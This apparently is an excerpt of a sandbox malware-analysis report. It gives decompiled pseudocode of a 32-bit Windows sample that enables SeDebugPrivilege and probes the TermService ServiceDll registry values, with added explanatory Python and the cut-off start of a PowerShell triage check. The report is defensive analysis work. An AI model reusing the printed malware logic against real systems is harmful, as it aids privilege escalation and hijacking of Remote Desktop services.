                                  				void* _t10;
                                  				void* _t26;
                                  				struct _QUERY_SERVICE_CONFIG* _t34;
                                  				void* _t37;
                                  
                                  				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);   // SC_MANAGER_CONNECT
                                  				_t37 = _t10;
                                  				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);   // SERVICE_QUERY_CONFIG; *_a4 is the service name
                                  					if(_t26 != 0) {
						// sizing call: with a NULL buffer this fails with ERROR_INSUFFICIENT_BUFFER (0x7a) and leaves the size needed in _v8
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                  							_t34 = E00406045(_v8);
                                  							_a4 = _t34;
                                  							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                  								CloseServiceHandle(_t37);
                                  								CloseServiceHandle(_t26);
								E00401099(_a4);   // HeapFree of the config buffer (subcall 00401099) ...
								_t10 =  *(_t34 + 4);   // ... yet, in the decompiled order, the result is read from it afterwards: offset 4 of QUERY_SERVICE_CONFIG is dwStartType, so the function returns the service's start mode, not its binary path
                                  							} else {
                                  								goto L6;
                                  							}
                                  						} else {
                                  							L6:
                                  							CloseServiceHandle(_t37);
                                  							CloseServiceHandle(_t26);
                                  							goto L7;
                                  						}
                                  					} else {
                                  						CloseServiceHandle(_t37);
                                  						L7:
                                  						_t10 = 0;
                                  					}
                                  				}
                                  				return _t10;
                                  			}
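What the function above returns is easy to misread: QUERY_SERVICE_CONFIGW starts with dwServiceType at offset 0 and dwStartType at offset 4, and lpBinaryPathName only comes at offset 12, so `*(_t34 + 4)` is the start mode. The Python below is an added example, not code from the sandbox report or from the sample. It lays the structure out the way the SCM fills it for a 32-bit caller (the dump is based at 0x400000, a 32-bit PE), decodes a buffer, and names the field the sample reads; on a Windows host `query_start_type()` runs the same two-call protocol through ctypes. The buffer built by `build_config32()` is constructed test data, and the service name and paths in the test are illustrative, not values taken from the sample.

```python
"""Decode the 32-bit QUERY_SERVICE_CONFIGW buffer that E0040D42D fills.
Added example (not from the report or the sample); the buffer built here is constructed."""
import ctypes, struct, sys

ERROR_INSUFFICIENT_BUFFER = 0x7A   # GetLastError value the sample tests after its sizing call
SC_MANAGER_CONNECT, SERVICE_QUERY_CONFIG = 0x0001, 0x0001   # the access rights the sample asks for
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
               3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}

# QUERY_SERVICE_CONFIGW in a 32-bit process: nine 4-byte fields (DWORDs and pointers), 36 bytes.
FIELDS = ("dwServiceType", "dwStartType", "dwErrorControl", "lpBinaryPathName",
          "lpLoadOrderGroup", "dwTagId", "lpDependencies", "lpServiceStartName", "lpDisplayName")
POINTER_FIELDS = ("lpBinaryPathName", "lpLoadOrderGroup", "lpDependencies",
                  "lpServiceStartName", "lpDisplayName")
_HEADER = struct.Struct("<9I")


def build_config32(base, service_type, start_type, error_control, binary_path,
                   display_name, start_name="LocalSystem"):
    """Lay a buffer out the way the SCM does for a 32-bit caller: fixed header first, the
    strings packed behind it, every pointer an absolute address (base + offset in buffer)."""
    strings = {"lpBinaryPathName": binary_path, "lpServiceStartName": start_name,
               "lpDisplayName": display_name}
    blob = bytearray(_HEADER.size)
    ptrs = dict.fromkeys(POINTER_FIELDS, 0)            # string fields not supplied stay NULL
    for name, text in strings.items():
        ptrs[name] = base + len(blob)
        blob += text.encode("utf-16-le") + b"\x00\x00"
    _HEADER.pack_into(blob, 0, service_type, start_type, error_control,
                      ptrs["lpBinaryPathName"], ptrs["lpLoadOrderGroup"], 0,
                      ptrs["lpDependencies"], ptrs["lpServiceStartName"], ptrs["lpDisplayName"])
    return bytes(blob)


def _wstr(buf, base, ptr):
    """Follow a 32-bit pointer into the buffer and read a NUL-terminated UTF-16LE string."""
    if ptr == 0:
        return None
    off = ptr - base
    if off < 0 or off >= len(buf) or off % 2:
        raise ValueError(f"pointer {ptr:#x} does not land inside the buffer")
    return buf[off:].decode("utf-16-le").split("\x00", 1)[0]


def parse_config32(buf, base):
    """Decode every field; base is the address the buffer had inside the 32-bit process."""
    cfg = dict(zip(FIELDS, _HEADER.unpack_from(buf, 0)))
    for name in POINTER_FIELDS:
        cfg[name] = _wstr(buf, base, cfg[name])
    cfg["start_type_name"] = START_TYPES.get(cfg["dwStartType"], "unknown")
    return cfg


def sample_return_value(buf):
    """What E0040D42D hands back: *(buffer + 4), i.e. dwStartType, not the binary path."""
    return struct.unpack_from("<I", buf, 4)[0]


def query_start_type(service_name):
    """Windows-only live check with the same two QueryServiceConfigW calls as the sample; None on
    other platforms or on any failure. ctypes.Structure keeps the layout right for this Python's bitness."""
    if sys.platform != "win32":
        return None
    from ctypes import wintypes

    class QSC(ctypes.Structure):
        _fields_ = [("dwServiceType", wintypes.DWORD), ("dwStartType", wintypes.DWORD),
                    ("dwErrorControl", wintypes.DWORD), ("lpBinaryPathName", wintypes.LPWSTR),
                    ("lpLoadOrderGroup", wintypes.LPWSTR), ("dwTagId", wintypes.DWORD),
                    ("lpDependencies", wintypes.LPWSTR), ("lpServiceStartName", wintypes.LPWSTR),
                    ("lpDisplayName", wintypes.LPWSTR)]
    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    adv.OpenSCManagerW.restype = adv.OpenServiceW.restype = wintypes.SC_HANDLE
    adv.OpenSCManagerW.argtypes = (wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.DWORD)
    adv.OpenServiceW.argtypes = (wintypes.SC_HANDLE, wintypes.LPCWSTR, wintypes.DWORD)
    adv.QueryServiceConfigW.argtypes = (wintypes.SC_HANDLE, ctypes.c_void_p, wintypes.DWORD, wintypes.LPDWORD)
    adv.CloseServiceHandle.argtypes = (wintypes.SC_HANDLE,)
    scm = adv.OpenSCManagerW(None, "ServicesActive", SC_MANAGER_CONNECT)
    if not scm:
        return None
    try:
        svc = adv.OpenServiceW(scm, service_name, SERVICE_QUERY_CONFIG)
        if not svc:
            return None
        try:
            needed = wintypes.DWORD(0)
            # sizing call: must fail with ERROR_INSUFFICIENT_BUFFER and report the size required
            if (adv.QueryServiceConfigW(svc, None, 0, ctypes.byref(needed))
                    or ctypes.get_last_error() != ERROR_INSUFFICIENT_BUFFER):
                return None
            buf = ctypes.create_string_buffer(needed.value)
            if not adv.QueryServiceConfigW(svc, buf, needed.value, ctypes.byref(needed)):
                return None
            return ctypes.cast(buf, ctypes.POINTER(QSC)).contents.dwStartType
        finally:
            adv.CloseServiceHandle(svc)
    finally:
        adv.CloseServiceHandle(scm)
```

The pointer fields are absolute addresses inside the same allocation, which is why a memory-dump copy of such a buffer can only be decoded once you know where it lived; the 32-bit layout is hard-coded here because the sample is a 32-bit process, and the ctypes path is left to the runtime so the same check works from 64-bit Python.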









                                  Address column for the listing above: 0x0040d43d to 0x0040d4d8

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                  • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                  • GetLastError.KERNEL32 ref: 0040D47F
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                  • String ID: ServicesActive
                                  • API String ID: 1929760286-3071072050
                                  • Opcode ID: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction ID: 77105f180dc1f4f583609010b4a2cd32bd7f1b8692fb86ee244d35c389544786
                                  • Opcode Fuzzy Hash: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction Fuzzy Hash: B2119071904218BBC7119BB2DC49DDF3FBDEF853607118176F902E2250DB78AE04CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040DD72(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v52;
                                  				char _v60;
                                  				char _v68;
                                  				char _v76;
                                  				signed int _v80;
                                  				char _v84;
                                  				char _v88;
                                  				char _v92;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				intOrPtr _v104;
                                  				char _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				int _t102;
                                  				int _t103;
                                  				int _t106;
                                  				int _t107;
                                  				void* _t109;
                                  				void* _t110;
                                  				int _t111;
                                  				int _t113;
                                  				int _t114;
                                  				int _t120;
                                  				void* _t121;
                                  				int _t159;
                                  				void* _t172;
                                  				int _t181;
                                  				int _t182;
                                  				signed int _t203;
                                  				char* _t233;
                                  				intOrPtr _t244;
                                  				void* _t248;
                                  				char* _t251;
                                  				void* _t264;
                                  				struct _CRITICAL_SECTION* _t267;
                                  				signed int _t276;
                                  				signed int _t278;
                                  				signed int _t279;
                                  				void* _t281;
                                  
                                  				_t264 = __edx;
                                  				_t205 = __ecx;
                                  				_t281 = (_t279 & 0xfffffff8) - 0x5c;
                                  				_t267 = __ecx;
                                  				_t203 = 0;
                                  				_v84 = 0;
                                  				_v80 = 0;
                                  				_v96 = 0;
                                  				EnterCriticalSection(__ecx);
                                  				if(E00411177(_t205) == 1) {
                                  					_t205 =  &_v96;
                                  					E00410CFF( &_v96);
                                  				}
                                  				_t270 = _t267 + 0x38;
                                  				_t102 = PathFileExistsW( *(_t267 + 0x38));
                                  				_t283 = _t102;
                                  				if(_t102 != 0) {
                                  					L14:
                                  					_t271 = _t267 + 0x3c;
                                  					_t103 = PathFileExistsW( *(_t267 + 0x3c));
                                  					__eflags = _t103;
                                  					if(_t103 != 0) {
                                  						L20:
                                  						E0040DB52(_t267, _t264);
                                  						E0040DB39(_t267);
                                  						_t208 = _t267;
                                  						_t106 = E0040D8FB(_t267);
                                  						__eflags = _t106;
                                  						if(_t106 != 0) {
                                  							_t209 = _t267;
                                  							_t107 = E0040D856(_t267, _t264, _t208);
                                  							__eflags = _t107;
                                  							if(_t107 != 0) {
								E0040DAD6(_t209);
								_t109 = E004036F7( &_v92, L"SeDebugPrivilege");
								_t110 = GetCurrentProcess();
								_t265 = _t109;
								_t111 = E00410B38(_t110, _t109);   // given the current process handle and the privilege name, most likely a token adjustment that enables SeDebugPrivilege
                                  								E00405FEB(_v96);
                                  								__eflags = _t111;
                                  								if(_t111 != 0) {
                                  									_t213 =  *(_t267 + 0x2c);
                                  									_t113 = E0041229C( *(_t267 + 0x2c));
                                  									__eflags = _t113;
                                  									if(_t113 != 0) {
										Sleep(0x3e8);   // 1000 ms
                                  										_t114 =  *(_t267 + 0x4c);
                                  										__eflags = _t114;
                                  										if(_t114 != 0) {
                                  											_t276 = _t203;
                                  											__eflags = _t276 - _t114;
                                  											do {
                                  												E00405DE9(_t213 & 0xffffff00 | __eflags > 0x00000000);
                                  												E0040373F( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
                                  												E0040D3A8( &_v96);
                                  												_t213 = _v100;
                                  												E00405FEB(_v100);
                                  												_t276 = _t276 + 1;
                                  												_v100 = _t203;
                                  												__eflags = _t276 -  *(_t267 + 0x4c);
                                  											} while (_t276 <  *(_t267 + 0x4c));
                                  										}
                                  										Sleep(0x1f4);
                                  										E0040373F( &_v92, _t267 + 0x28);
                                  										E0040D3A8( &_v96);
                                  										_t215 = _v100;
                                  										E00405FEB(_v100);
                                  										Sleep(0x1f4);
                                  										_t120 = E0040D4DB(_t265, __eflags, _v100);
                                  										__eflags = _t120;
                                  										if(_t120 != 0) {
                                  											_t121 = E00411177(_t215);
                                  											__eflags = _t121 - 1;
                                  											if(_t121 == 1) {
                                  												E00410CD8(_v96);
                                  											}
                                  											E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
                                  											E00404C3B( &_v84);
                                  											LeaveCriticalSection(_t267);
                                  											_t203 = 8;
                                  										} else {
                                  											_push(_t267 + 0x60);
                                  											_push(_t267 + 0x5c);
                                  											_push(7);
                                  											goto L34;
                                  										}
                                  									} else {
                                  										E00410CD8(_v96);
                                  										_push(_t267 + 0x60);
                                  										_push(_t267 + 0x5c);
                                  										_push(5);
                                  										goto L34;
                                  									}
                                  								} else {
                                  									E00410CD8(_v96);
                                  									_push(_t267 + 0x60);
                                  									_push(_t267 + 0x5c);
                                  									_push(3);
                                  									goto L34;
                                  								}
                                  							} else {
                                  								E00410CD8(_v96);
                                  								_push(_t267 + 0x60);
                                  								_push(_t267 + 0x5c);
                                  								_push(6);
                                  								goto L34;
                                  							}
                                  						} else {
                                  							E00410CD8(_v96);
                                  							_push(_t267 + 0x60);
                                  							_push(_t267 + 0x5c);
                                  							_push(4);
                                  							L34:
                                  							E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68));
                                  							E00404C3B( &_v84);
                                  							LeaveCriticalSection(_t267);
                                  						}
                                  					} else {
                                  						E0040373F(_t281, _t271);
                                  						E00411722( &_v32, __eflags, _t205, _t203);
                                  						_t232 =  *((intOrPtr*)(_t267 + 0x58));
                                  						E00415847( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
                                  						__eflags = _v100 - _t203;
                                  						if(_v100 != _t203) {
                                  							_t233 =  &_v28;
                                  							_t159 = E0041130F(_t233, _t232, _t232);
                                  							__eflags = _t159;
                                  							if(_t159 != 0) {
                                  								_push(_t233);
                                  								E0041165C( &_v28,  &_v76);
                                  								E00411644( &_v36);
                                  							}
                                  							E00403148( &_v76);
                                  							E0041140C( &_v28, __eflags);
                                  							goto L20;
                                  						} else {
                                  							E00403148( &_v76);
                                  							goto L8;
                                  						}
                                  					}
                                  				} else {
                                  					E0040373F(_t281, _t270);
                                  					E00411722( &_v32, _t283, _t205, _t203);
                                  					E0040373F(_t281, _t267 + 0x40);
                                  					E00411722( &_v68, _t283,  &_v32, _t203);
                                  					_v116 = _t203;
                                  					_v112 = _t203;
                                  					_v100 = _t203;
                                  					_v96 = _t203;
                                  					_t172 = E00411177( &_v68);
                                  					_t244 =  *((intOrPtr*)(_t267 + 0x58));
                                  					if(_t172 != 1) {
                                  						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
                                  						E00403148( &_v84);
                                  						_t278 = _v100;
                                  						E004030CC( &_v108, _t278, 0x12e00);
                                  						_t248 = _t278 + 0x12e00;
                                  						_t179 = _v104 + 0xfffed200;
                                  						__eflags = _v104 + 0xfffed200;
                                  					} else {
                                  						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
                                  						E00403148( &_v84);
                                  						_t278 = _v100;
                                  						E004030CC( &_v108, _t278, 0x1c800);
                                  						_t248 = _t278 + 0x1c800;
                                  						_t179 = _v104 + 0xfffe3800;
                                  					}
                                  					E004030CC( &_v76, _t248, _t179);
                                  					_t285 = _t278;
                                  					if(_t278 != 0) {
                                  						_t250 =  &_v28;
                                  						_t181 = E0041130F(_t250,  &_v76,  &_v76);
                                  						__eflags = _t181;
                                  						if(_t181 != 0) {
                                  							_push(_t250);
                                  							E0041165C( &_v28,  &_v92);
                                  							_t250 =  &_v36;
                                  							E00411644( &_v36);
                                  						}
                                  						_t251 =  &_v52;
                                  						_t182 = E0041130F(_t251, _t250, _t250);
                                  						__eflags = _t182;
                                  						if(_t182 != 0) {
                                  							_push(_t251);
                                  							E0041165C( &_v52,  &_v76);
                                  							E00411644( &_v60);
                                  						}
                                  						E00403148( &_v76);
                                  						E00403148( &_v92);
                                  						E0041140C( &_v52, __eflags);
                                  						_t205 =  &_v28;
                                  						E0041140C( &_v28, __eflags);
                                  						goto L14;
                                  					} else {
                                  						E00403148( &_v76);
                                  						E00403148( &_v92);
                                  						E0041140C( &_v52, _t285);
                                  						L8:
                                  						E0041140C( &_v28, _t285);
                                  						_t203 = _t203 | 0xffffffff;
                                  					}
                                  				}
                                  				E00403148( &_v84);
                                  				return _t203;
                                  			}
                                  0x0040dd72
                                  0x0040dd72
                                  0x0040dd78
                                  0x0040dd7e
                                  0x0040dd80
                                  0x0040dd83
                                  0x0040dd87
                                  0x0040dd8b
                                  0x0040dd8f
                                  0x0040dd9d
                                  0x0040dd9f
                                  0x0040dda3
                                  0x0040dda3
                                  0x0040dda8
                                  0x0040ddad
                                  0x0040ddb3
                                  0x0040ddb5
                                  0x0040df34
                                  0x0040df34
                                  0x0040df39
                                  0x0040df3f
                                  0x0040df41
                                  0x0040dfb5
                                  0x0040dfb7
                                  0x0040dfbe
                                  0x0040dfc3
                                  0x0040dfc5
                                  0x0040dfca
                                  0x0040dfcc
                                  0x0040dfe7
                                  0x0040dfe9
                                  0x0040dfee
                                  0x0040dff0
                                  0x0040e00a
                                  0x0040e018
                                  0x0040e01f
                                  0x0040e025
                                  0x0040e029
                                  0x0040e034
                                  0x0040e039
                                  0x0040e03b
                                  0x0040e055
                                  0x0040e058
                                  0x0040e05d
                                  0x0040e05f
                                  0x0040e084
                                  0x0040e086
                                  0x0040e089
                                  0x0040e08b
                                  0x0040e08d
                                  0x0040e08f
                                  0x0040e091
                                  0x0040e094
                                  0x0040e0a4
                                  0x0040e0ae
                                  0x0040e0b3
                                  0x0040e0b7
                                  0x0040e0bf
                                  0x0040e0c0
                                  0x0040e0c4
                                  0x0040e0c4
                                  0x0040e0c8
                                  0x0040e0d3
                                  0x0040e0dd
                                  0x0040e0e7
                                  0x0040e0ec
                                  0x0040e0f0
                                  0x0040e0fa
                                  0x0040e0fd
                                  0x0040e102
                                  0x0040e104
                                  0x0040e134
                                  0x0040e139
                                  0x0040e13c
                                  0x0040e142
                                  0x0040e142
                                  0x0040e15d
                                  0x0040e166
                                  0x0040e16c
                                  0x0040e174
                                  0x0040e106
                                  0x0040e109
                                  0x0040e10d
                                  0x0040e10e
                                  0x00000000
                                  0x0040e10e
                                  0x0040e061
                                  0x0040e065
                                  0x0040e06d
                                  0x0040e071
                                  0x0040e072
                                  0x00000000
                                  0x0040e072
                                  0x0040e03d
                                  0x0040e041
                                  0x0040e049
                                  0x0040e04d
                                  0x0040e04e
                                  0x00000000
                                  0x0040e04e
                                  0x0040dff2
                                  0x0040dff6
                                  0x0040dffe
                                  0x0040e002
                                  0x0040e003
                                  0x00000000
                                  0x0040e003
                                  0x0040dfce
                                  0x0040dfd2
                                  0x0040dfda
                                  0x0040dfde
                                  0x0040dfdf
                                  0x0040e110
                                  0x0040e11d
                                  0x0040e126
                                  0x0040e12c
                                  0x0040e12c
                                  0x0040df43
                                  0x0040df48
                                  0x0040df51
                                  0x0040df56
                                  0x0040df63
                                  0x0040df68
                                  0x0040df6c
                                  0x0040df7e
                                  0x0040df82
                                  0x0040df87
                                  0x0040df89
                                  0x0040df8b
                                  0x0040df95
                                  0x0040df9e
                                  0x0040df9e
                                  0x0040dfa7
                                  0x0040dfb0
                                  0x00000000
                                  0x0040df6e
                                  0x0040df72
                                  0x00000000
                                  0x0040df72
                                  0x0040df6c
                                  0x0040ddbb
                                  0x0040ddc0
                                  0x0040ddc9
                                  0x0040ddd6
                                  0x0040dddf
                                  0x0040dde4
                                  0x0040dde8
                                  0x0040ddec
                                  0x0040ddf0
                                  0x0040ddf4
                                  0x0040ddf9
                                  0x0040de03
                                  0x0040de57
                                  0x0040de60
                                  0x0040de65
                                  0x0040de73
                                  0x0040de7c
                                  0x0040de82
                                  0x0040de82
                                  0x0040de05
                                  0x0040de15
                                  0x0040de1e
                                  0x0040de23
                                  0x0040de31
                                  0x0040de3a
                                  0x0040de40
                                  0x0040de40
                                  0x0040de8d
                                  0x0040de92
                                  0x0040de94
                                  0x0040dec4
                                  0x0040dec8
                                  0x0040decd
                                  0x0040decf
                                  0x0040ded1
                                  0x0040dedb
                                  0x0040dee0
                                  0x0040dee4
                                  0x0040dee4
                                  0x0040deeb
                                  0x0040deef
                                  0x0040def4
                                  0x0040def6
                                  0x0040def8
                                  0x0040df02
                                  0x0040df0b
                                  0x0040df0b
                                  0x0040df14
                                  0x0040df1d
                                  0x0040df26
                                  0x0040df2b
                                  0x0040df2f
                                  0x00000000
                                  0x0040de96
                                  0x0040de9a
                                  0x0040dea3
                                  0x0040deac
                                  0x0040deb1
                                  0x0040deb5
                                  0x0040deba
                                  0x0040deba
                                  0x0040de94
                                  0x0040e179
                                  0x0040e186

                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                    • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 00411326
                                    • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                    • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                  • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 1717069549-2896544425
                                  • Opcode ID: bd499b9f6ca473f58f7055de6267ad5708b7c0db8c744d15ecef71a80a25f5d5
                                  • Instruction ID: 55d7e5f8d1f4b9ec0964da3279b74dcd5ea268b2ca2f52e34cb3dca68faebe82
                                  • Opcode Fuzzy Hash: bd499b9f6ca473f58f7055de6267ad5708b7c0db8c744d15ecef71a80a25f5d5
                                  • Instruction Fuzzy Hash: D0B13171504245ABC304EF62CC919EFB7A8BF54348F40093EF552A71D1EB78EA49CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DB52(void* __ecx, void* __edx) {
                                  				void* _v8;
                                  				WCHAR* _v12;
                                  				signed int _v16;
                                  				short* _v20;
                                  				short* _v24;
                                  				char _v28;
                                  				int _v32;
                                  				char _v36;
                                  				void* _t50;
                                  				void* _t62;
                                  				void* _t72;
                                  				void* _t96;
                                  
                                  				_t96 = __edx;
                                  				_t72 = __ecx;
                                  				_v8 = 0;
                                  				E004036F7( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                  				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                  					_t50 = E00412569(_t96, E004036F7( &_v16, L"ImagePath"),  &_v36);
                                  					E00405FEB(_v16);
                                  					E00412554( &_v8);
                                  					if(_t50 != 0) {
                                  						E0040300A( &_v36,  &_v12);
                                  						E004030FE( &_v36);
                                  						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                  							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                  								_t62 = E00412569(_t96, E004036F7( &_v16, L"ServiceDll"),  &_v36);
                                  								E00405FEB(_v16);
                                  								_t107 = _t62;
                                  								if(_t62 != 0) {
                                  									E00403549(_t72 + 0x20, E004032E6( &_v16, E0040300A( &_v36,  &_v28), _t107));
                                  									E00405FEB(_v16);
                                  									_v16 = _v16 & 0x00000000;
                                  									E00405FEB(_v28);
                                  								}
                                  								E00412554( &_v8);
                                  							}
                                  						}
                                  						E00405FEB(_v12);
                                  						_v12 = _v12 & 0x00000000;
                                  					}
                                  				}
                                  				E00403148( &_v36);
                                  				E00405FEB(_v20);
                                  				E00405FEB(_v24);
                                  				return E00412554( &_v8);
                                  			}
                                  0x0040db52
                                  0x0040db5a
                                  0x0040db66
                                  0x0040db69
                                  0x0040db76
                                  0x0040db7e
                                  0x0040db8b
                                  0x0040db9b
                                  0x0040dbb6
                                  0x0040dbc0
                                  0x0040dbc8
                                  0x0040dbcf
                                  0x0040dbdc
                                  0x0040dbe4
                                  0x0040dbfb
                                  0x0040dc2a
                                  0x0040dc41
                                  0x0040dc4b
                                  0x0040dc50
                                  0x0040dc52
                                  0x0040dc6e
                                  0x0040dc76
                                  0x0040dc7e
                                  0x0040dc82
                                  0x0040dc82
                                  0x0040dc8a
                                  0x0040dc8a
                                  0x0040dc2a
                                  0x0040dc92
                                  0x0040dc97
                                  0x0040dc97
                                  0x0040dbcf
                                  0x0040dc9e
                                  0x0040dca6
                                  0x0040dcae
                                  0x0040dcbe

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DBF7
                                  • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                  • svchost.exe -k, xrefs: 0040DBFD
                                  • svchost.exe, xrefs: 0040DBEF
                                  • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                  • ImagePath, xrefs: 0040DBA5
                                  • ServiceDll, xrefs: 0040DC30
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                  • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                  • API String ID: 2246401353-3333427388
                                  • Opcode ID: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                  • Instruction ID: 0a0d703e0c22a180c861e42df2812f13597edfba14798331e50e127ee1e54c95
                                  • Opcode Fuzzy Hash: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                  • Instruction Fuzzy Hash: 4C41E631D00119ABDB15EBA2CD92EEEBB79AF14748F50006AF801B21D1EB785F45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%
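The two decompiled routines above (E0040DD72, which takes SeDebugPrivilege and calls into E0040D856 to open SYSTEM\CurrentControlSet\Services\TermService\Parameters, and E0040DB52, which reads the TermService ImagePath, confirms the service is hosted in svchost.exe, and then reads Parameters\ServiceDll) read exactly the registry values an analyst should compare against the Windows defaults when hunting for a swapped Remote Desktop service DLL. The PowerShell below is an added triage check written for this report; it is not code from the sample or from the sandbox, and it assumes the stock configuration (ImagePath hosting in svchost.exe, ServiceDll resolving to %SystemRoot%\System32\termsrv.dll with a valid Microsoft Authenticode signature).

```powershell
# Added example for this analysis report, not code from the sample.
# Reads the same TermService values the decompiled E0040DB52 reads and
# compares them with the Windows defaults (assumption: termsrv.dll in System32).
function Test-TermServiceRegistration {
    [CmdletBinding()]
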